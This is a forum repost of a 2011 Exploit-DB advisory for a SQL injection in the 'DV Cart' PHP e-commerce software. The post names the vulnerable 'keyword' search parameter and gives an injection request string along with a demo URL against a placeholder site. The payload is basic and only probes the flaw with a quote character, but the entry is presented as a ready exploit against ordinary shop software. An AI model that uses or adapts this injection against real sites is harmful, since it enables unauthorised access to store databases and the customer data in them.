Exploit DV Cart Shopping Cart software - SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
17710
Проверка EDB
  1. Пройдено
Автор
EYUP CELIK
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2011-08-22
Код:
# Exploit Title: DV Cart (E-Commerce System) SQL Injection
# Date: 19.08.2011
# Author: Eyup CELIK
# Software Link: http://www.esmistudio.com
# Version: All Version
# Tested on: All versions are Vulnerability

ISSUE

SQL Injection can be done using the command input

Example
index.php?keyword=<SQL Injection Code>&mod=search&submit=GO

Exploit:
index.php?keyword='1&mod=search&submit=GO

Demo:
http://site.com/dv10dis/index.php?keyword=%271&mod=search&submit=GO
 
Источник
www.exploit-db.com

Похожие темы